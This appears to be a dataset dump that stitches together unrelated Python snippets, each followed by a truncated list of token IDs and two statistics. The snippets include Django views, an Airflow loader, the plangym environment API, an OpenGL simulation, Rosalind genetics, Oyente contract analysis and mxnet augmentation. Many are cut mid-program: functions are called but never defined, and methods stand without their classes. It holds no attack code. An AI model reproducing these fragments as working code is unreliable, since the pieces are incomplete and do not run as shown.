import xml.etree.ElementTree as et from dateutil import parser from django.shortcuts import render from django.shortcuts import redirect from django.core.urlresolvers import reverse import untangle from .forms import MenuplanSearchForm from .forms import MenuplanCreateForm from .tables import MenuplanTable from .dbaccess import add_menuplan from .dbaccess import get_menuplans from .dbaccess import create_menuplan from .dbaccess import get_menuplan_display
[ 11748, 35555, 13, 316, 631, 13, 20180, 27660, 355, 2123, 198, 198, 6738, 3128, 22602, 1330, 30751, 198, 198, 6738, 42625, 14208, 13, 19509, 23779, 1330, 8543, 198, 6738, 42625, 14208, 13, 19509, 23779, 1330, 18941, 198, 6738, 42625, 14208...
3.615385
130
from contextlib import closing from io import StringIO import numpy import pandas from airflow.providers.postgres.hooks.postgres import PostgresHook from psycopg2.extensions import connection as psycopg2_connection from data_detective_airflow.dag_generator.works import WorkType from data_detective_airflow.operators.sinks.pg_loader import PgLoader, MAX_INSERT_ROWS_NUMBER
[ 6738, 4732, 8019, 1330, 9605, 198, 6738, 33245, 1330, 10903, 9399, 198, 198, 11748, 299, 32152, 198, 11748, 19798, 292, 198, 6738, 45771, 13, 15234, 4157, 13, 7353, 34239, 13, 25480, 82, 13, 7353, 34239, 1330, 2947, 34239, 39, 566, 198,...
3.298246
114
"""Plangym API implementation.""" from abc import ABC from typing import Any, Callable, Dict, Generator, Iterable, Optional, Tuple, Union import gym from gym.envs.registration import registry as gym_registry from gym.spaces import Space import numpy import numpy as np wrap_callable = Union[Callable[[], gym.Wrapper], Tuple[Callable[..., gym.Wrapper], Dict[str, Any]]] def step( self, action: Union[numpy.ndarray, int, float], state: numpy.ndarray = None, dt: int = 1, ) -> tuple: """ Step the environment applying the supplied action. Optionally set the state to the supplied state before stepping it. Take ``dt`` simulation steps and make the environment evolve in multiples \ of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps. Args: action: Chosen action applied to the environment. state: Set the environment to the given state before stepping it. dt: Consecutive number of times that the action will be applied. Returns: if state is None returns ``(observs, reward, terminal, info)`` else returns ``(new_state, observs, reward, terminal, info)`` """ if state is not None: self.set_state(state) obs, reward, terminal, info = self.step_with_dt(action=action, dt=dt) if state is not None: new_state = self.get_state() data = new_state, obs, reward, terminal, info else: data = obs, reward, terminal, info if terminal and self.autoreset: self.reset(return_state=False) return data def step_batch( self, actions: Union[numpy.ndarray, Iterable[Union[numpy.ndarray, int]]], states: Union[numpy.ndarray, Iterable] = None, dt: Union[int, numpy.ndarray] = 1, ) -> Tuple[numpy.ndarray, ...]: """ Vectorized version of the `step` method. It allows to step a vector of \ states and actions. The signature and behaviour is the same as `step`, but taking a list of \ states, actions and dts as input. Args: actions: Iterable containing the different actions to be applied. states: Iterable containing the different states to be set. 
dt: int or array containing the frameskips that will be applied. Returns: if states is None returns ``(observs, rewards, ends, infos)`` else returns ``(new_states, observs, rewards, ends, infos)`` """ dt = ( dt if isinstance(dt, (numpy.ndarray, Iterable)) else numpy.ones(len(actions), dtype=int) * dt ) no_states = states is None or states[0] is None states = [None] * len(actions) if no_states else states data = [self.step(action, state, dt=dt) for action, state, dt in zip(actions, states, dt)] return tuple(list(x) for x in zip(*data)) def init_env(self) -> None: """ Run environment initialization. Including in this function all the code which makes the environment impossible to serialize will allow to dispatch the environment to different workers and initialize it once it's copied to the target process. """ pass def close(self) -> None: """Tear down the current environment.""" pass def sample_action(self): """ Return a valid action that can be used to step the Environment. Implementing this method is optional, and it's only intended to make the testing process of the Environment easier. """ pass def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1) -> tuple: """ Take ``dt`` simulation steps and make the environment evolve in multiples \ of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps. Args: action: Chosen action applied to the environment. dt: Consecutive number of times that the action will be applied. Returns: tuple containing ``(observs, reward, terminal, info)``. """ raise NotImplementedError() def reset( self, return_state: bool = True, ) -> Union[numpy.ndarray, Tuple[numpy.ndarray, numpy.ndarray]]: """ Restart the environment. Args: return_state: If ``True`` it will return the state of the environment. Returns: ``obs`` if ```return_state`` is ``True`` else return ``(state, obs)``. """ raise NotImplementedError() def get_state(self) -> Any: """ Recover the internal state of the simulation. 
A state must completely describe the Environment at a given moment. """ raise NotImplementedError() def set_state(self, state: Any) -> None: """ Set the internal state of the simulation. Args: state: Target state to be set in the environment. Returns: None """ raise NotImplementedError() def get_image(self) -> Union[None, np.ndarray]: """ Return a numpy array containing the rendered view of the environment. Square matrices are interpreted as a greyscale image. Three-dimensional arrays are interpreted as RGB images with channels (Height, Width, RGB) """ return None def clone(self) -> "BaseEnvironment": """Return a copy of the environment.""" raise NotImplementedError() class PlanEnvironment(BaseEnvironment): """Base class for implementing OpenAI ``gym`` environments in ``plangym``.""" def __init__( self, name: str, frameskip: int = 1, episodic_live: bool = False, autoreset: bool = True, wrappers: Iterable[wrap_callable] = None, delay_init: bool = False, remove_time_limit=True, ): """ Initialize a :class:`PlanEnvironment`. Args: name: Name of the environment. Follows standard gym syntax conventions. frameskip: Number of times an action will be applied for each ``dt``. episodic_live: Return ``end = True`` when losing a live. autoreset: Automatically reset the environment when the OpenAI environment returns ``end = True``. wrappers: Wrappers that will be applied to the underlying OpenAI env. \ Every element of the iterable can be either a :class:`gym.Wrapper` \ or a tuple containing ``(gym.Wrapper, kwargs)``. delay_init: If ``True`` do not initialize the ``gym.Environment`` \ and wait for ``init_env`` to be called later. remove_time_limit: If True, remove the time limit from the environment. 
""" self._gym_env = None self.episodic_life = episodic_live self.remove_time_limit = remove_time_limit self._wrappers = wrappers super(PlanEnvironment, self).__init__( name=name, frameskip=frameskip, autoreset=autoreset, delay_init=delay_init, ) def init_env(self): """Initialize the target :class:`gym.Env` instance.""" self._gym_env = self.init_gym_env() if self._wrappers is not None: self.apply_wrappers(self._wrappers) def get_image(self) -> np.ndarray: """ Return a numpy array containing the rendered view of the environment. Square matrices are interpreted as a greyscale image. Three-dimensional arrays are interpreted as RGB images with channels (Height, Width, RGB) """ if hasattr(self.gym_env, "render"): return self.gym_env.render(mode="rgb_array") def reset( self, return_state: bool = True, ) -> Union[numpy.ndarray, Tuple[numpy.ndarray, numpy.ndarray]]: """ Restart the environment. Args: return_state: If ``True`` it will return the state of the environment. Returns: ``obs`` if ```return_state`` is ``True`` else return ``(state, obs)``. """ if self.gym_env is None and self.delay_init: self.init_env() obs = self.gym_env.reset() return (self.get_state(), obs) if return_state else obs def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1): """ Take ``dt`` simulation steps and make the environment evolve in multiples\ of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps. Args: action: Chosen action applied to the environment. dt: Consecutive number of times that the action will be applied. 
Returns: if state is None returns ``(observs, reward, terminal, info)`` else returns ``(new_state, observs, reward, terminal, info)`` """ reward = 0 obs, lost_live, terminal, oob = None, False, False, False info = {"lives": -1} n_steps = 0 for _ in range(int(dt)): for _ in range(self.frameskip): obs, _reward, _oob, _info = self.gym_env.step(action) _info["lives"] = self.get_lives_from_info(_info) lost_live = info["lives"] > _info["lives"] or lost_live oob = oob or _oob custom_terminal = self.custom_terminal_condition(info, _info, _oob) terminal = terminal or oob or custom_terminal terminal = (terminal or lost_live) if self.episodic_life else terminal info = _info.copy() reward += _reward n_steps += 1 if terminal: break if terminal: break # This allows to get the original values even when using an episodic life environment info["terminal"] = terminal info["lost_live"] = lost_live info["oob"] = oob info["win"] = self.get_win_condition(info) info["n_steps"] = n_steps return obs, reward, terminal, info def sample_action(self) -> Union[int, np.ndarray]: """Return a valid action that can be used to step the Environment chosen at random.""" if hasattr(self.action_space, "sample"): return self.action_space.sample() def clone(self) -> "PlanEnvironment": """Return a copy of the environment.""" return self.__class__( name=self.name, frameskip=self.frameskip, wrappers=self._wrappers, episodic_live=self.episodic_life, autoreset=self.autoreset, delay_init=self.delay_init, ) def close(self): """Close the underlying :class:`gym.Env`.""" if hasattr(self, "_gym_env") and hasattr(self._gym_env, "close"): return self._gym_env.close() def init_gym_env(self) -> gym.Env: """Initialize the :class:`gym.Env`` instance that the current class is wrapping.""" # Remove any undocumented wrappers spec = gym_registry.spec(self.name) if self.remove_time_limit: if hasattr(spec, "max_episode_steps"): spec._max_episode_steps = spec.max_episode_steps if hasattr(spec, "max_episode_time"): 
spec._max_episode_time = spec.max_episode_time spec.max_episode_steps = None spec.max_episode_time = None gym_env: gym.Env = spec.make() gym_env.reset() return gym_env def seed(self, seed=None): """Seed the underlying :class:`gym.Env`.""" if hasattr(self.gym_env, "seed"): return self.gym_env.seed(seed) def apply_wrappers(self, wrappers: Iterable[wrap_callable]): """Wrap the underlying OpenAI gym environment.""" for item in wrappers: if isinstance(item, tuple): wrapper, kwargs = item self.wrap(wrapper, **kwargs) else: self.wrap(item) def wrap(self, wrapper: Callable, *args, **kwargs): """Apply a single OpenAI gym wrapper to the environment.""" self._gym_env = wrapper(self.gym_env, *args, **kwargs) def render(self, mode=None): """Render the environment using OpenGL. This wraps the OpenAI render method.""" if hasattr(self.gym_env, "render"): return self.gym_env.render(mode=mode) class VideogameEnvironment(PlanEnvironment): """Common interface for working with video games that run using an emulator.""" def __init__( self, name: str, frameskip: int = 5, episodic_live: bool = False, autoreset: bool = True, delay_init: bool = False, remove_time_limit: bool = True, obs_type: str = "rgb", # ram | rgb | grayscale mode: int = 0, # game mode, see Machado et al. 2018 difficulty: int = 0, # game difficulty, see Machado et al. 2018 repeat_action_probability: float = 0.0, # Sticky action probability full_action_space: bool = False, # Use all actions render_mode: Optional[str] = None, # None | human | rgb_array possible_to_win: bool = False, wrappers: Iterable[wrap_callable] = None, ): """ Initialize a :class:`VideogameEnvironment`. Args: name: Name of the environment. Follows standard gym syntax conventions. frameskip: Number of times an action will be applied for each step in dt. episodic_live: Return ``end = True`` when losing a life. autoreset: Restart environment when reaching a terminal state. 
delay_init: If ``True`` do not initialize the ``gym.Environment`` and wait for ``init_env`` to be called later. remove_time_limit: If True, remove the time limit from the environment. obs_type: One of {"rgb", "ram", "gryscale"}. mode: Integer or string indicating the game mode, when available. difficulty: Difficulty level of the game, when available. repeat_action_probability: Repeat the last action with this probability. full_action_space: Whether to use the full range of possible actions or only those available in the game. render_mode: One of {None, "human", "rgb_aray"}. possible_to_win: It is possible to finish the Atari game without getting a terminal state that is not out of bounds or doest not involve losing a life. wrappers: Wrappers that will be applied to the underlying OpenAI env. Every element of the iterable can be either a :class:`gym.Wrapper` or a tuple containing ``(gym.Wrapper, kwargs)``. """ self._remove_time_limit = remove_time_limit self.possible_to_win = possible_to_win self._obs_type = obs_type self._mode = mode self._difficulty = difficulty self._repeat_action_probability = repeat_action_probability self._full_action_space = full_action_space self._render_mode = render_mode super(VideogameEnvironment, self).__init__( name=name, frameskip=frameskip, episodic_live=episodic_live, autoreset=autoreset, wrappers=wrappers, delay_init=delay_init, ) def clone(self, **kwargs) -> "VideogameEnvironment": """Return a copy of the environment.""" params = dict( name=self.name, frameskip=self.frameskip, wrappers=self._wrappers, episodic_live=self.episodic_life, autoreset=self.autoreset, delay_init=self.delay_init, possible_to_win=self.possible_to_win, clone_seeds=self.clone_seeds, mode=self.mode, difficulty=self.difficulty, obs_type=self.obs_type, repeat_action_probability=self.repeat_action_probability, full_action_space=self.full_action_space, render_mode=self.render_mode, remove_time_limit=self._remove_time_limit, ) params.update(**kwargs) return 
self.__class__(**params) def get_ram(self) -> np.ndarray: """Return the ram of the emulator as a numpy array.""" raise NotImplementedError() class VectorizedEnvironment(BaseEnvironment, ABC): """ Base class that defines the API for working with vectorized environments. A vectorized environment allows to step several copies of the environment in parallel when calling ``step_batch``. It creates a local copy of the environment that is the target of all the other methods of :class:`BaseEnvironment`. In practise, a :class:`VectorizedEnvironment` acts as a wrapper of an environment initialized with the provided parameters when calling __init__. """ def __init__( self, env_class, name: str, frameskip: int = 1, autoreset: bool = True, delay_init: bool = False, n_workers: int = 8, **kwargs, ): """ Initialize a :class:`VectorizedEnvironment`. Args: env_class: Class of the environment to be wrapped. name: Name of the environment. frameskip: Number of times ``step`` will me called with the same action. autoreset: Ignored. Always set to True. Automatically reset the environment when the OpenAI environment returns ``end = True``. delay_init: If ``True`` do not initialize the ``gym.Environment`` \ and wait for ``init_env`` to be called later. env_callable: Callable that returns an instance of the environment \ that will be parallelized. n_workers: Number of workers that will be used to step the env. **kwargs: Additional keyword arguments passed to env_class.__init__. 
""" self._n_workers = n_workers self._env_class = env_class self._env_kwargs = kwargs self._plangym_env = None self.SINGLETON = env_class.SINGLETON if hasattr(env_class, "SINGLETON") else False self.RETURNS_GYM_TUPLE = ( env_class.RETURNS_GYM_TUPLE if hasattr(env_class, "RETURNS_GYM_TUPLE") else True ) self.STATE_IS_ARRAY = ( env_class.STATE_IS_ARRAY if hasattr(env_class, "STATE_IS_ARRAY") else True ) super(VectorizedEnvironment, self).__init__( name=name, frameskip=frameskip, autoreset=autoreset, delay_init=delay_init, ) def __getattr__(self, item): """Forward attributes to the wrapped environment.""" return getattr(self.plangym_env, item) def create_env_callable(self, **kwargs) -> Callable[..., BaseEnvironment]: """Return a callable that initializes the environment that is being vectorized.""" callable_kwargs = dict( env_class=self._env_class, name=self.name, frameskip=self.frameskip, delay_init=self._env_class.SINGLETON, **self._env_kwargs, ) callable_kwargs.update(kwargs) return create_env_callable(**callable_kwargs) def init_env(self) -> None: """Initialize the target environment with the parameters provided at __init__.""" self._plangym_env: BaseEnvironment = self.create_env_callable()() self._plangym_env.init_env() def step(self, action: numpy.ndarray, state: numpy.ndarray = None, dt: int = 1): """ Step the environment applying a given action from an arbitrary state. If is not provided the signature matches the one from OpenAI gym. It allows \ to apply arbitrary boundary conditions to define custom end states in case \ the env was initialized with a "CustomDeath' object. Args: action: Array containing the action to be applied. state: State to be set before stepping the environment. dt: Consecutive number of times to apply the given action. Returns: if states is None returns `(observs, rewards, ends, infos) `else \ `(new_states, observs, rewards, ends, infos)`. 
""" return self.plangym_env.step(action=action, state=state, dt=dt) def reset(self, return_state: bool = True): """ Reset the environment and returns the first observation, or the first \ (state, obs) tuple. Args: return_state: If true return a also the initial state of the env. Returns: Observation of the environment if `return_state` is False. Otherwise, return (state, obs) after reset. """ state, obs = self.plangym_env.reset(return_state=True) self.sync_states(state) return (state, obs) if return_state else obs def get_state(self): """ Recover the internal state of the simulation. An state completely describes the Environment at a given moment. Returns: State of the simulation. """ return self.plangym_env.get_state() def set_state(self, state): """ Set the internal state of the simulation. Args: state: Target state to be set in the environment. """ self.plangym_env.set_state(state) self.sync_states(state) def render(self, mode="human"): """Render the environment using OpenGL. This wraps the OpenAI render method.""" return self.plangym_env.render(mode) def get_image(self) -> np.ndarray: """ Return a numpy array containing the rendered view of the environment. Square matrices are interpreted as a greyscale image. Three-dimensional arrays are interpreted as RGB images with channels (Height, Width, RGB) """ return self.plangym_env.get_image() def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1) -> tuple: """ Take ``dt`` simulation steps and make the environment evolve in multiples\ of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps. Args: action: Chosen action applied to the environment. dt: Consecutive number of times that the action will be applied. 
Returns: If state is None returns ``(observs, reward, terminal, info)`` else returns ``(new_state, observs, reward, terminal, info)`` """ return self.plangym_env.step_with_dt(action=action, dt=dt) def sample_action(self): """ Return a valid action that can be used to step the Environment. Implementing this method is optional, and it's only intended to make the testing process of the Environment easier. """ return self.plangym_env.sample_action() def sync_states(self, state: None): """ Synchronize the workers' states with the state of ``self.gym_env``. Set all the states of the different workers of the internal :class:`BatchEnv`\ to the same state as the internal :class:`Environment` used to apply the\ non-vectorized steps. """ raise NotImplementedError() def step_batch( self, actions: numpy.ndarray, states: numpy.ndarray = None, dt: [numpy.ndarray, int] = 1, ): """ Vectorized version of the ``step`` method. It allows to step a vector of states and actions. The signature and \ behaviour is the same as ``step``, but taking a list of states, actions \ and dts as input. Args: actions: Iterable containing the different actions to be applied. states: Iterable containing the different states to be set. dt: int or array containing the frameskips that will be applied. Returns: if states is None returns ``(observs, rewards, ends, infos)`` else \ ``(new_states, observs, rewards, ends, infos)`` """ raise NotImplementedError() def clone(self, **kwargs) -> "BaseEnvironment": """Return a copy of the environment.""" self_kwargs = dict( name=self.name, frameskip=self.frameskip, delay_init=self.delay_init, env_class=self._env_class, n_workers=self.n_workers, **self._env_kwargs, ) self_kwargs.update(kwargs) env = self.__class__(**self_kwargs) return env
[ 37811, 3646, 648, 4948, 7824, 7822, 526, 15931, 198, 6738, 450, 66, 1330, 9738, 198, 6738, 19720, 1330, 4377, 11, 4889, 540, 11, 360, 713, 11, 35986, 11, 40806, 540, 11, 32233, 11, 309, 29291, 11, 4479, 198, 198, 11748, 11550, 198, ...
2.340045
10,728
# Layer 2 server script # project worker '''-. +#_p'-..... *+...:(loop):.............................................. m}: \ >!: 1. register clients \ &w^: 2. distribute WLs and add them to pending \ j/6: 3. move results to results dir \ @%: 4. remove timed-out from pending and re-open them : #$: 5. check if done / 6@y: 6. backup and call htmlUpdate / <: / %$":......................................................../ %&"$%!.- $"!.- ''' import sys, os, pickle, shutil, htmlTool from time import time, sleep os.chdir(os.path.expanduser("~")) project = sys.argv[-1] projDir = f'apps/aligner/projects/{project}' clientsDir = f'{projDir}/clients' regDir = f'{projDir}/registrations' backupDir = f'{projDir}/backup' resDir = f'{projDir}/results' # load from backup with open(f'{backupDir}/openWLs','rb') as tmp: openWLs = pickle.load(tmp) with open(f'{backupDir}/pendingWLs','rb') as tmp: pendingWLs = pickle.load(tmp) with open(f'{backupDir}/assignmentTimes','rb') as tmp: assignmentTimes = pickle.load(tmp) print(f'{project}: \tretrieved data from project backup (open: {len(openWLs)}; pending: {len(pendingWLs)})') backup_counter = 0 done = False while not done: # 1. for ID in os.listdir(regDir): registerClient(ID) os.remove(f'{regDir}/{ID}') # 2. passWLs() # 3. moveResults() # 4. reopen() # 5. if checkDone(): done = True # 6. if backup_counter == 100 or done: backup() try: htmlTool.update() except: pass backup_counter = 0 if done: os.rename(projDir,f'{projDir}__done__') backup_counter += 1 sleep(1.74)
[ 2, 34398, 362, 4382, 4226, 201, 198, 2, 1628, 8383, 201, 198, 201, 198, 201, 198, 7061, 29001, 13, 201, 198, 10, 2, 62, 79, 29001, 12359, 201, 198, 9, 10, 986, 37498, 26268, 2599, 8864, 2109, 16317, 201, 198, 76, 38362, 220, 220, ...
1.927326
1,032
import factory from spaceone.core import utils from spaceone.statistics.model.schedule_model import Schedule, Scheduled, JoinQuery, Formula, QueryOption
[ 11748, 8860, 198, 198, 6738, 2272, 505, 13, 7295, 1330, 3384, 4487, 198, 6738, 2272, 505, 13, 14269, 3969, 13, 19849, 13, 15952, 5950, 62, 19849, 1330, 19281, 11, 27774, 6309, 11, 15251, 20746, 11, 19639, 11, 43301, 19722, 628, 628, 6...
3.785714
42
from datetime import datetime from sqlalchemy import Boolean, Column, DateTime, Integer, SmallInteger, String from app.config import settings from app.db.base_class import Base from app.models.task import Task # noqa
[ 6738, 4818, 8079, 1330, 4818, 8079, 198, 198, 6738, 44161, 282, 26599, 1330, 41146, 11, 29201, 11, 7536, 7575, 11, 34142, 11, 10452, 46541, 11, 10903, 198, 198, 6738, 598, 13, 11250, 1330, 6460, 198, 6738, 598, 13, 9945, 13, 8692, 62,...
3.745763
59
import uuid, hashlib, os, yaml, logging.config, json, requests, re from bcrypt import hashpw, gensalt from collections import namedtuple from sqlalchemy import create_engine from datetime import datetime CONFIG_FILE = os.environ.get('CONFIG_PATH_FILE') ZimbraGrant = namedtuple( 'ZimbraGrant', [ 'target_name', 'target_type', 'grantee_name', 'grantee_type', 'right', 'deny' ] ) logger = CallLogger.logger()
[ 11748, 334, 27112, 11, 12234, 8019, 11, 28686, 11, 331, 43695, 11, 18931, 13, 11250, 11, 33918, 11, 7007, 11, 302, 198, 6738, 275, 29609, 1330, 12234, 79, 86, 11, 308, 641, 2501, 198, 6738, 17268, 1330, 3706, 83, 29291, 198, 6738, 4...
2.531429
175
import struct from typing import BinaryIO def write(self, file: BinaryIO, val): raise NotImplementedError # pragma: no cover class CMarkedType(CFixedType): """ Overview: Type with struct mark, which can be directly read by ``struct`` module. """ def __init__(self, mark: str, size: int): """ Constructor of :class:`CMarkedType`. :param mark: Mark of the type. :param size: Size of the type. """ CFixedType.__init__(self, size) self.__mark = mark def read(self, file: BinaryIO): """ Read from binary with ``struct`` module. :param file: Binary file, ``io.BytesIO`` is supported as well. :return: Result value. """ r, = struct.unpack(self.mark, file.read(self.size)) return r def write(self, file: BinaryIO, val): """ Write value to binary IO with ``struct`` module. :param file: Binary file, ``io.BytesIO`` is supported as well. :param val: Writing value. """ file.write(struct.pack(self.mark, float(val)))
[ 11748, 2878, 198, 6738, 19720, 1330, 45755, 9399, 628, 628, 198, 220, 220, 220, 825, 3551, 7, 944, 11, 2393, 25, 45755, 9399, 11, 1188, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 5298, 1892, 3546, 1154, 12061, 12331, 220, 1303, 2...
2.389362
470
# Mendel's First Law # http://rosalind.info/problems/iprb/ import sys import unittest if __name__ == '__main__': hom_dom = int(sys.argv[1]) het = int(sys.argv[2]) hom_rec = int(sys.argv[3]) if hom_dom == 0 or het == 0 or hom_rec == 0: raise Exception("ERROR: Incorrect parameters") result = iprb().main(hom_dom, het, hom_rec) print(result)
[ 2, 20442, 417, 338, 3274, 3854, 198, 2, 2638, 1378, 4951, 282, 521, 13, 10951, 14, 1676, 22143, 14, 541, 26145, 14, 198, 11748, 25064, 198, 11748, 555, 715, 395, 198, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 19...
2.433566
143
#MAIN method and graphics try: from OpenGL.GL import * from OpenGL import GLU import OpenGL.GL.shaders except: print("OpenGL wrapper for python not found") import glfw import numpy as np from computation import Computation if __name__ == "__main__": #A good configuration: 80x80 balls, space 24, width=height=1000, size=8, speedrange=20, frameskip=3, epsilon=0.01, blocksize=512 comp=Computation(width=1000, height=1000, space=20, xballs=100, yballs=100, speedrange=20,size=4,frameskip=1,epsilon=0.01,blocksize=512) g=Graphics(1000, 1000,comp) g.mainloop();
[ 2, 5673, 1268, 2446, 290, 9382, 201, 198, 28311, 25, 201, 198, 220, 220, 220, 422, 30672, 13, 8763, 1330, 1635, 201, 198, 220, 220, 220, 422, 30672, 1330, 10188, 52, 201, 198, 220, 220, 220, 1330, 30672, 13, 8763, 13, 1477, 9972, ...
2.607759
232
#!/usr/bin/env python from itertools import chain from pathlib import Path from typing import List INPUT_FILE = Path.cwd().parent / "inputs" / "day06.txt" AnswerGroup = List[str] if __name__ == "__main__": with INPUT_FILE.open("r") as f: input = transform_input(f.read()) print(f"Part 1: {part1(input)}") print(f"Part 2: {part2(input)}")
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 6738, 340, 861, 10141, 1330, 6333, 198, 6738, 3108, 8019, 1330, 10644, 198, 6738, 19720, 1330, 7343, 198, 198, 1268, 30076, 62, 25664, 796, 10644, 13, 66, 16993, 22446, 8000, 1220, ...
2.496599
147
from symopt.base import SymOptExpr import sympy as sym
[ 6738, 5659, 8738, 13, 8692, 1330, 15845, 27871, 3109, 1050, 198, 11748, 10558, 88, 355, 5659, 628 ]
3.294118
17
import json import glob from tqdm import tqdm import os contract_dir = 'contract_data' cfiles = glob.glob(contract_dir+'/contract*.json') cjson = {} print "Loading contracts..." for cfile in tqdm(cfiles): cjson.update(json.loads(open(cfile).read())) results = {} missed = [] print "Running analysis..." for c in tqdm(cjson): with open('tmp.evm','w') as of: # print "Out: "+cjson[c][1][2:] of.write(cjson[c][1][2:]+"\0") os.system('python oyente.py tmp.evm -j -b') try: results[c] = json.loads(open('tmp.evm.json').read()) except: missed.append(c) print "Writing results..." with open('results.json', 'w') as of: of.write(json.dumps(results,indent=1)) with open('missed.json', 'w') as of: of.write(json.dumps(missed,indent=1)) print "Completed."
[ 11748, 33918, 198, 11748, 15095, 198, 6738, 256, 80, 36020, 1330, 256, 80, 36020, 198, 11748, 28686, 198, 198, 28484, 62, 15908, 796, 705, 28484, 62, 7890, 6, 220, 198, 198, 12993, 2915, 796, 15095, 13, 4743, 672, 7, 28484, 62, 15908,...
2.432177
317
#! /usr/bin/python # -*- coding: utf-8 -*- import pytest import numpy as np from textory.util import neighbour_diff_squared, num_neighbours, neighbour_count, create_kernel from textory.statistics import variogram, pseudo_cross_variogram def test_variogram(init_np_arrays): """THIS TEST ONLY COVERS THE VERSION WITH INEXACT NEIGHBOUR COUNT ON THE EDGES This test needs improvement in calculation and what is tested. Much code is shared with the "neighbour_diff_squared" test in test_util. """ a, _ = init_np_arrays tmp = np.zeros_like(a) lag = 1 lags = range(-lag, lag + 1) rows, cols = a.shape #calculate variogram difference for i in range(0, cols): for j in range(0, rows): for l in lags: for k in lags: if (i+l < 0) | (i+l >= cols) | (j+k < 0) | (j+k >= rows) | ((l == 0) & (k == 0)): continue else: tmp[i,j] += np.square((a[i, j] - a[i+l, j+k])) tmp = np.nansum(tmp) res = tmp / 40000 assert variogram(a, lag=1) == res def test_pseudo_cross_variogram(init_np_arrays): """THIS TEST ONLY COVERS THE VERSION WITH INEXACT NEIGHBOUR COUNT ON THE EDGES This test needs improvement in calculation and what is tested. Much code is shared with the "neighbour_diff_squared" test in test_util. """ a, b = init_np_arrays tmp = np.zeros_like(a) lag = 1 lags = range(-lag, lag + 1) rows, cols = a.shape #calculate variogram difference for i in range(0, cols): for j in range(0, rows): for l in lags: for k in lags: if (i+l < 0) | (i+l >= cols) | (j+k < 0) | (j+k >= rows) | ((l == 0) & (k == 0)): continue else: tmp[i,j] += np.square((a[i, j] - b[i+l, j+k])) tmp = np.nansum(tmp) res = tmp / 40000 assert pseudo_cross_variogram(a, b, lag=1) == res
[ 2, 0, 1220, 14629, 14, 8800, 14, 29412, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 11748, 12972, 9288, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 2420, 652, 13, 22602, 1330, 12250, 62, 26069, 62, ...
2.081443
970
# -*- coding: utf-8 -*- # @Author : LG """ 152 ms, Python3 96.83% 14 MB, Python3 12.45% """
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 2488, 13838, 220, 1058, 17370, 198, 198, 37811, 198, 17827, 13845, 11, 220, 11361, 18, 9907, 13, 5999, 4, 220, 198, 1415, 10771, 11, 220, 11361, 18, 1105, 13, 2231,...
1.890909
55
#Leia o sexo de uma pessoa, s aceite as letras M ou F; Caso contrario, pea a digitao novamente sexo= str(input('Digite seu sexo [M/F]: ')).strip().upper()[0] while sexo not in 'MF': sexo=str(input('DIGITE O SEXO [M/F]: ')).strip().upper()[0] print('seu sexo {} e est registrado com sucesso!'.format(sexo))
[ 2, 3123, 544, 267, 1714, 78, 390, 334, 2611, 279, 408, 12162, 11, 264, 31506, 578, 355, 1309, 8847, 337, 267, 84, 376, 26, 11294, 78, 3445, 4982, 11, 613, 64, 257, 3100, 5350, 78, 645, 85, 3263, 68, 198, 198, 8044, 78, 28, 965, ...
2.301471
136
from nonebot.adapters.onebot.v11.event import MessageEvent from nonebot.typing import T_State from nonebot.adapters.onebot.v11 import Bot, Message from plugins.uma.plugins.uma_whois.data_source import UmaWhois from plugins.uma import chara #matcher =on_endswith({'','?',''},priority=5) matcher =UmaWhois().on_regex(r'^(.*)([? ])?',"whois") #matcher =on_startswith('',priority=5) matcher =UmaWhois().on_regex(r'^(.*)([? ])?',"whois")
[ 6738, 4844, 13645, 13, 324, 12126, 13, 505, 13645, 13, 85, 1157, 13, 15596, 1330, 16000, 9237, 198, 6738, 4844, 13645, 13, 774, 13886, 1330, 309, 62, 9012, 198, 6738, 4844, 13645, 13, 324, 12126, 13, 505, 13645, 13, 85, 1157, 1330, ...
2.573964
169
from django.http import HttpResponse from pyspark.sql import SparkSession from django.shortcuts import render from datetime import datetime from core.chartfactory import createBarChart, createPieChart from core.dataprocessor import DataProcessor def sample(request): """ sample python report """ keys = ('Python', 'C++', 'Java', 'Perl', 'Scala', 'Lisp') values = [10,8,6,4,2,1] image_base64 = createBarChart(keys, values, 'Usage', 'Programming language usages') return render( request, 'analyzer/main.html', { 'name': "Jon", 'date': datetime.now(), 'image_base64':image_base64, } ) #google play app report 1 #google play app report 2 #google play app report 3
[ 6738, 42625, 14208, 13, 4023, 1330, 367, 29281, 31077, 198, 6738, 279, 893, 20928, 13, 25410, 1330, 17732, 36044, 198, 6738, 42625, 14208, 13, 19509, 23779, 1330, 8543, 198, 6738, 4818, 8079, 1330, 4818, 8079, 198, 198, 6738, 4755, 13, ...
2.536667
300
from mxnet import nd import os import sys sys.path.append(os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..'))) import utils.common as dataset_commons import cv2 import numpy as np import glob import pandas as pd from gluoncv.data.transforms.presets.ssd import SSDDefaultTrainTransform from matplotlib import pyplot as plt ''' This code only gives you a tool to visualize the images pointed in the csv file and the related bounding boxes using openCV ''' data_common = dataset_commons.get_dataset_files() # classes_keys = [key for key in data_common['classes']] if __name__ == "__main__": source_images_path = data_common['image_folder'] source_csv_path = data_common['csv_path'] # TODO: Set the file save path images_path_save = 'images_augmented/' # Folder that will contain the resized images csv_path_save = 'images_augmented/csv/val_dataset.csv' img_height = 300 img_width = 300 csv_converter = load_images_from_csv_and_augment(source_images_path, source_csv_path, images_path_save, img_width, img_height) if not os.path.exists(images_path_save): try: os.makedirs(images_path_save + 'csv') except OSError as e: if e.errno != errno.EEXIST: raise csv_converter.to_csv(csv_path_save, index=None) print('Successfully converted to a new csv file.')
